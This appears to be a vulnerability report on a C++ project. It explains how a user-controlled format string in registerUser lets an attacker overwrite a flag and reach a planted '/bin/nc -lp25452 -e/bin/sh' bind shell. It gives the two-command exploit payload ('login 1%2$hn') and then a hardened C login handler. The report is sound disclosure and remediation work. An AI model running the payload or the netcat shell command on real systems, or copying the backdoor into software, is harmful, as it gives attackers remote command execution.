In the function `registerUser`, a user-controlled input is used as a format string: https://github.com/xavierpantet/my_ass_on_your_grass/blob/355151c90db67b16c7d5877d37a71ef1b92c1f78/src/services/authentication/AuthenticationService.cpp#L16-L20

Furthermore, `registerUser` is called each time the `login` command is issued by a user, and `name` is the parameter passed to the `login` command. Thus a user could pass a valid format string to carry out a format string attack and overwrite `login` with a non-zero value.

Then, in the function `user_already_logged`, if `getLogin` (which returns the value of `login` defined in `registerUser`) of the current user (the one passed by `login` earlier) is non-zero, a snippet of code that executes `/bin/nc -lp25452 -e/bin/sh` is called: https://github.com/xavierpantet/my_ass_on_your_grass/blob/5265459c2eaf05b87a79ccbd51487ce17b85405b/src/commands/Commands.cpp#L280-L295

Exploit:

The following sequence of commands will trigger this vulnerability:

login 1%2$hn
login q

The first `login` rewrites the `login` variable. The second is there to call the function `user_already_login`, which checks whether this client has already executed `login` with another username.
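The fix for this class of bug is to never let user input reach the format argument. The following is an added example, not the project's code: a hypothetical login handler that rejects names containing `%` before any formatting call and always passes the name as an argument to a literal format string, so a payload like `1%2$hn` is either refused or copied verbatim instead of being interpreted.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hardened form of the pattern the report describes. The vulnerable
 * version is snprintf(out, n, name): the user-supplied name becomes the
 * format string, so directives such as %n write to memory. Here the
 * format string is a literal and the name is only ever an argument. */
static void format_greeting_safe(char *out, size_t n, const char *name) {
    snprintf(out, n, "Logged in as %s", name);
}

/* Input validation to apply before a name reaches any formatting or
 * logging call: a username has no legitimate need for '%', and a single
 * stray '%' is all it takes once the string is used as a format. */
bool has_format_directive(const char *s) {
    return strchr(s, '%') != NULL;
}

/* Hypothetical login handler (an assumption, not the project's API).
 * Returns 0 on success and -1 when the name is rejected; on success
 * the greeting is written into out. */
int handle_login(char *out, size_t n, const char *name) {
    if (has_format_directive(name)) {
        /* Log with a literal format so the rejected value is inert. */
        fprintf(stderr, "rejected login name: %s\n", name);
        return -1;
    }
    format_greeting_safe(out, n, name);
    return 0;
}

/* Convenience wrapper: returns the greeting, or NULL if rejected. */
static char last_greeting[128];
const char *login_result(const char *name) {
    if (handle_login(last_greeting, sizeof last_greeting, name) != 0)
        return NULL;
    return last_greeting;
}

int main(void) {
    /* Constructed sample inputs: the report's payload and a plain name. */
    const char *r1 = login_result("1%2$hn");
    const char *r2 = login_result("q");
    printf("%s\n%s\n", r1 ? r1 : "(rejected)", r2 ? r2 : "(rejected)");
    return 0;
}
```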